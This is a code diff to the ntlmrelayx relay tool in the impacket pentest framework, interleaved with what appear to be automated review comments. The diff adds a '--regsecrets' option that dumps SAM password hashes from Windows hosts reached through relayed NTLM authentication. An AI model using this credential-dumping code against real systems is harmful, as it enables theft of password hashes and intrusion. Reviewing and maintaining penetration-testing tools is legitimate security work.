diff --git a/examples/ntlmrelayx.py b/examples/ntlmrelayx.py
index 87b37a88b7..73390b89ad 100644
--- a/examples/ntlmrelayx.py
+++ b/examples/ntlmrelayx.py
@@ -185,6 +185,7 @@ def start_servers(options, threads):
 c.setTargets(targetSystem)
 c.setExeFile(options.e)
 c.setCommand(options.c)
+ c.setRegSecrets(options.regsecrets)
 c.setEnumLocalAdmins(options.enum_local_admins)
 c.setAddComputerSMB(options.add_computer)
 c.setDisableMulti(options.no_multirelay)
@@ -358,6 +359,7 @@ def stop_servers(threads):
 'If not specified, hashes will be dumped (secretsdump.py must be in the same directory)')
 smboptions.add_argument('--enum-local-admins', action='store_true', required=False, help='If relayed user is not admin, attempt SAMR lookup to see who is (only works pre Win 10 Anniversary)')
 smboptions.add_argument('--rpc-attack', action='store', choices=[None, "TSCH", "ICPR"], required=False, default=None, help='Select the attack to perform over RPC over named pipes.')
+ smboptions.add_argument('--regsecrets', action='store_true', required=False, help='Do SAM dump with regsecrets instead of secretsdump.')
 
 #RPC arguments
 rpcoptions = parser.add_argument_group("RPC client options")
@@ -451,6 +453,10 @@ def stop_servers(threads):
 if options.rpc_use_smb and not options.auth_smb:
 logging.error("Set -auth-smb to relay DCE/RPC to SMB pipes")
 sys.exit(1)
+
+ if options.regsecrets and options.c:
+ logging.error("SAM dump with regsecrets is not compatible with executing a command")
+ sys.exit(1)
 
 # Ensuring the correct target is set when performing SCCM policies attack
 if options.sccm_policies is True and not options.target.rstrip('/').endswith("/ccm_system_windowsauth/request"):
diff --git a/impacket/examples/ntlmrelayx/attacks/smbattack.py b/impacket/examples/ntlmrelayx/attacks/smbattack.py
index d111c518e9..1b638a2533 100644
--- a/impacket/examples/ntlmrelayx/attacks/smbattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/smbattack.py
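Review bot: The help string on the new `--regsecrets` option in the `@@ -358` hunk tells the operator neither what changes on the target nor that the flag cannot be combined with `-c`, which the validation later in this same file enforces. Judging by the smbattack.py hunk, the regsecrets path never calls `remoteOps.saveSAM()` and hands `remoteOps` straight to `SAMHashes`, so "no SAM hive written to disk on the target" is presumably the property a user picks it for (confirm against regsecrets.py before promising it). Suggest `help='Dump SAM hashes with regsecrets instead of secretsdump (does not save the SAM hive on the target); incompatible with -c'`. The argument-group setup this line belongs to starts outside the hunk.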
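Review bot: The new guard in the `@@ -451` hunk rejects `--regsecrets` together with `-c` but not with `-e`, although in smbattack.py the SAM-dump code is the `else:` branch reached after the command handling, so `--regsecrets -e file` would presumably just ignore the flag instead of failing early the way `-c` now does (the exe branch itself is outside the visible hunks, so treat this as inferred). Extend the check to both options: `if options.regsecrets and (options.c or options.e):` with `logging.error("--regsecrets dumps SAM hashes and cannot be combined with -c or -e")`. The option-validation block this sits in starts and ends outside the hunk.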
@@ -157,7 +157,11 @@ def run(self): LOG.error(str(e)) else: - from impacket.examples.secretsdump import RemoteOperations, SAMHashes + if (self.config.regSecrets): + from impacket.examples.regsecrets import RemoteOperations, SAMHashes + else: + from impacket.examples.secretsdump import RemoteOperations, SAMHashes + from impacket.examples.ntlmrelayx.utils.enum import EnumLocalAdmins samHashes = None try: @@ -197,15 +201,20 @@ def run(self): else: bootKey = remoteOps.getBootKey() remoteOps._RemoteOperations__serviceDeleted = True - samFileName = remoteOps.saveSAM() - samHashes = SAMHashes(samFileName, bootKey, isRemote = True) + if (self.config.regSecrets): + LOG.debug("Dumping SAM with regsecrets") + samHashes = SAMHashes(bootKey, remoteOps = remoteOps) + else: + LOG.debug("Dumping SAM with secretsdump") + samFileName = remoteOps.saveSAM() + samHashes = SAMHashes(samFileName, bootKey, isRemote = True) samHashes.dump() samHashes.export(self.__SMBConnection.getRemoteHost()+'_samhashes') LOG.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost()) except Exception as e: LOG.error(str(e)) finally: - if samHashes is not None: + if (not self.config.regSecrets) and (samHashes is not None): samHashes.finish() if remoteOps is not None: remoteOps.finish() diff --git a/impacket/examples/ntlmrelayx/utils/config.py b/impacket/examples/ntlmrelayx/utils/config.py index c996fa5e69..b93a9eaae8 100644 --- a/impacket/examples/ntlmrelayx/utils/config.py +++ b/impacket/examples/ntlmrelayx/utils/config.py @@ -62,6 +62,7 @@ def __init__(self): self.enumLocalAdmins = False self.SMBServerChallenge = None self.rpc_attack = None + self.regSecrets = False # RPC options self.rpc_mode = None @@ -150,6 +151,9 @@ def setExeFile(self, filename): def setCommand(self, command): self.command = command + + def setRegSecrets(self, regSecrets): + self.regSecrets = regSecrets def setEnumLocalAdmins(self, enumLocalAdmins): self.enumLocalAdmins = enumLocalAdmins
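Review bot: The conditional import at the top of the new `else:` branch in the `@@ -157` hunk only works because `impacket.examples.regsecrets` exports a class literally named `RemoteOperations`: the existing context line further down in `run()` writes `remoteOps._RemoteOperations__serviceDeleted = True` through name mangling, and with any other class name that assignment would silently create a new attribute instead of flipping the flag. A comment next to the import would spare the next maintainer that surprise: `# both modules must export RemoteOperations/SAMHashes with the same interface; the _RemoteOperations__serviceDeleted poke below depends on the class name`. As a point of style, the parentheses in `if (self.config.regSecrets):` are unnecessary in Python. `run()` starts and ends outside the hunk.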
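Review bot: The changed `finally` clause in the `@@ -197` hunk skips `samHashes.finish()` whenever regSecrets is set, but nothing records why; if the reason is that the regsecrets `SAMHashes` has no `finish()` because it reads through `remoteOps=` and never calls `saveSAM()`, so there is no hive file to delete, that assumption should be visible at the call site, since an exception between `samHashes.dump()` and `export()` on that path now relies on it. Either state it, `# regsecrets reads SAM via remoteOps and saves no hive file, so there is nothing to finish()`, or test the capability rather than the flag, `if samHashes is not None and hasattr(samHashes, 'finish'):`, which stays correct if regsecrets later grows cleanup. The parenthesised forms `if (self.config.regSecrets):` and `(not self.config.regSecrets) and (samHashes is not None)` are unidiomatic. `run()` starts and ends outside the hunk.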